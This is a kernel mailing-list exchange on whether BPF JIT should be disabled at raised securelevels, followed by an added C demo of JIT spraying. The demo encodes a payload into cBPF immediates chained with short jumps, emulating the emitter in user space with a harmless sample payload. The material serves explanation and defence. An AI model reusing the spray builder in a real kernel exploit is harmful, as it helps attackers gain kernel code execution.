Christos Zoulas wrote:
> In article <20150101153259.GA2442@neva>,
> Alexander Nasonov <[email protected]> wrote:
> >I don't remember seeing a policy on disabling jit code at securelevel
> >1 or higher. Is it something we should add?
>
> I am not sure that we should add it because the code it generates is tightly
> controlled by the kernel.
On a (misconfigured) system with enhanced permissions for tcpdump or for some
other pcap program, one can craft special JIT code to help exploit a bug in
the kernel:

http://mainisusuallyafunction.blogspot.com/2012/11/attacking-hardened-linux-systems-with.html

The function pointer of the JIT code is readable via kmem.

Alex
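The point of the reply is that the "tightly controlled" JIT output still carries attacker-chosen bytes: every `ld #k` in a cBPF filter puts a 32-bit immediate, supplied by the (unprivileged or merely pcap-capable) program, verbatim into the generated machine code. The following user-space C program is an added illustration of that kernel JIT-spray idea as described in the linked post; it is not code from this thread and not NetBSD's bpfjit. It assumes a naive x86 emitter that turns `ld #k` into `mov eax, imm32` (`b8 imm32`) and `ret a` into `ret` (`c3`), which is an assumption made for the demo, and it uses a constructed 6-byte sample payload. Nothing here touches a kernel: it builds the filter, emulates the emitter into a byte buffer, and then walks the buffer from offset 1 the way a CPU would if something jumped there, recovering the payload from the chain of immediates.

```c
/*
 * Added demo of kernel JIT spraying with cBPF immediates (not NetBSD's
 * bpfjit, not code from the thread). Runs entirely in user space.
 */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Same layout as struct bpf_insn in <net/bpf.h>; redeclared to stay self-contained. */
struct insn {
    uint16_t code;
    uint8_t  jt, jf;
    uint32_t k;
};

#define CODE_LD_IMM 0x00   /* BPF_LD|BPF_W|BPF_IMM : A <- k   */
#define CODE_RET_A  0x16   /* BPF_RET|BPF_A        : return A */

/* x86 opcodes the assumed naive emitter produces. */
#define X86_MOV_EAX_IMM 0xb8
#define X86_RET         0xc3
#define X86_JMP_SHORT   0xeb

/*
 * Pack a 2-byte payload chunk into one immediate as "p0 p1 eb 01".
 * Executed from p0, the CPU runs p0 p1, then "jmp +1", which hops over the
 * next instruction's b8 opcode byte and lands on its immediate.
 */
static uint32_t chunk_imm(uint8_t p0, uint8_t p1)
{
    return (uint32_t)p0 | ((uint32_t)p1 << 8) |
           ((uint32_t)X86_JMP_SHORT << 16) | (0x01u << 24);
}

/* Turn a payload into "ld #k" instructions followed by "ret a". Returns insn count, 0 if out is too small. */
size_t build_spray_filter(const uint8_t *payload, size_t len, struct insn *out, size_t max)
{
    size_t n = 0;
    for (size_t i = 0; i < len; i += 2) {
        if (n + 2 > max)                     /* keep room for the trailing ret */
            return 0;
        uint8_t p0 = payload[i];
        uint8_t p1 = (i + 1 < len) ? payload[i + 1] : 0x90; /* pad odd length with nop */
        out[n].code = CODE_LD_IMM;
        out[n].jt = out[n].jf = 0;
        out[n].k = chunk_imm(p0, p1);
        n++;
    }
    out[n].code = CODE_RET_A;
    out[n].jt = out[n].jf = 0;
    out[n].k = 0;
    return n + 1;
}

/* Assumed naive JIT: ld #k -> b8 imm32 (little-endian), ret a -> c3. Returns bytes emitted, 0 on error. */
size_t emulate_jit(const struct insn *prog, size_t n, uint8_t *code, size_t max)
{
    size_t len = 0;
    for (size_t i = 0; i < n; i++) {
        switch (prog[i].code) {
        case CODE_LD_IMM:
            if (len + 5 > max)
                return 0;
            code[len++] = X86_MOV_EAX_IMM;
            for (int b = 0; b < 4; b++)      /* immediate is copied in verbatim */
                code[len++] = (uint8_t)(prog[i].k >> (8 * b));
            break;
        case CODE_RET_A:
            if (len + 1 > max)
                return 0;
            code[len++] = X86_RET;
            break;
        default:
            return 0;                        /* opcode not modelled by this demo */
        }
    }
    return len;
}

/*
 * Follow the misaligned path a CPU would take from code+1: two payload
 * bytes, then "eb 01", then skip the next b8. Returns payload bytes
 * recovered, 0 if the chain is broken.
 */
size_t recover_payload(const uint8_t *code, size_t len, uint8_t *out, size_t max)
{
    size_t got = 0;
    size_t pc = 1;                                   /* entry: one byte past the first b8 */
    while (pc + 4 <= len && code[pc - 1] == X86_MOV_EAX_IMM) {
        if (got + 2 > max)
            return 0;
        out[got++] = code[pc];
        out[got++] = code[pc + 1];
        if (code[pc + 2] != X86_JMP_SHORT || code[pc + 3] != 0x01)
            return 0;                                /* chain broken */
        pc += 5;                                     /* jmp +1 lands on the next immediate */
    }
    return got;
}

int main(void)
{
    /* Constructed sample payload: nop, nop, xor eax,eax, xor ebx,ebx. */
    const uint8_t payload[] = { 0x90, 0x90, 0x31, 0xc0, 0x31, 0xdb };
    struct insn prog[16];
    uint8_t code[128], back[64];

    size_t n    = build_spray_filter(payload, sizeof payload, prog, 16);
    size_t clen = emulate_jit(prog, n, code, sizeof code);
    size_t got  = recover_payload(code, clen, back, sizeof back);
    printf("insns=%zu jit_bytes=%zu recovered=%zu match=%d\n", n, clen, got,
           got == sizeof payload && memcmp(back, payload, got) == 0);
    return 0;
}
```

The demo stops where the post's attack begins: in the real case the emitted buffer lives in kernel memory, and the thread's last sentence is what makes it usable, since reading the JIT function pointer via kmem tells the attacker where the chain starts. Whether a securelevel policy helps therefore depends on whether it cuts off filter installation, kmem reads, or both.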
